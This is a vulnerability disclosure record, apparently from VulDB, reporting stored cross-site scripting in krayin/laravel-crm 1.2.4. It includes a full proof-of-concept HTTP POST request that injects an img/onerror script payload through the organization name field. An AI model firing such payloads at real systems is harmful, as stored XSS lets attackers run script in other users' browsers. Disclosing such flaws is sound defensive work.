| Titel | Cross-site Scripting (Stored XSS) in krayin/laravel-crm v1.2.4 |
|---|
| Beschreibung | Description:
laravel-crm version 1.2.4 is vulnerable to Cross Site Scripting (XSS) with group name in edit, create organizations in webkul
Source: https://github.com/krayin/laravel-crm
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Occurrences: https://github.com/krayin/laravel-
crm/blob/master/packages/Webkul/Admin/src/Http/Controllers/Contact/OrganizationController.php#L52-L108
Poc Request:
POST /laravel-crm/admin/contacts/organizations/edit/2 HTTP/1.1
Host: 192.168.125.197
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101
Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------
287614653021430389054091948804
Content-Length: 1113
Origin: http://192.168.125.197
Connection: close
Referer: http://192.168.125.197/laravel-crm/admin/contacts/organizations/edit/2
Cookie: XSRF-TOKEN=
Upgrade-Insecure-Requests: 1
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="_token"
pEiJe5Rmk81ZhvOyCgZqYkaMcf1jYyOnTV5wXh49
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="_method"
PUT
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="name"
2"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[address]"
2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[country]"
AZ
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[state]"
2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[city]"
2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[postcode]"
2
-----------------------------287614653021430389054091948804-- |
|---|
| Quelle | ⚠️ https://drive.google.com/file/d/1t7JwP0Qyo6ye-2dt6XhA1ENHDwsnYjD3/view?usp=sharing |
|---|
| Benutzer | huutuanbg97 (UID 45015) |
|---|
| Einreichung | 11.05.2023 14:56 (vor 3 Jahren) |
|---|
| Moderieren | 27.05.2023 09:18 (16 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 230079 [Webkul krayin crm 1.2.4 Edit Person Page 2 Firma Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|